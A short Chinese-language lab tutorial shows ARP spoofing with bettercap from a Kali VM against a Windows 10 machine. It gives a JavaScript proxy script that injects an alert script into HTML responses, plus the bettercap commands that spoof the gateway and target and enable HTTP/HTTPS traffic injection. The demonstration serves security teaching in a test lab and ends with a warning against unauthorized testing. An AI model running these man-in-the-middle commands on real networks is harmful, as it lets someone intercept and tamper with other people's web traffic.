0x00 目标
-
模拟arp欺骗,修改靶机IP的http和https返回包。
0x01 测试环境
-
名称
IP
备注
攻击
192.168.2.x
虚拟机 kali
靶机
192.168.2.x
客户机 win10
0x02 测试步骤
-
在kali /home/test 目录下写一个js脚本
-
function onResponse(req,res){ if(res.ContentType.indexOf('text/html')==0){ var body=res.ReadBody(); if(body.indexOf('</head>')!=-1){ res.Body=body.replace( '</head>', '<script type="text/javascript">alert("your computer has hacked!")</script></head>' ); } } }
- 启动bettercap
设置攻击目标
-
set arp.spoof.targets 192.168.2.1,192.168.2.181 #设置arp欺骗的目标,这里欺骗的是网关和目标机器
set http.proxy.script /home/test/1.js #往http流量中注入脚本
set https.proxy.script /home/test/1.js #往https流量中注入脚本
http.proxy on #开启HTTP代理
https.proxy on #开启HTTPS代理
arp.spoof on #开启ARP欺骗
靶机访问http,https网站
遵守网络安全法,请勿未经授权进行测试
© 版权声明
THE END
- 最新
- 最热
只看作者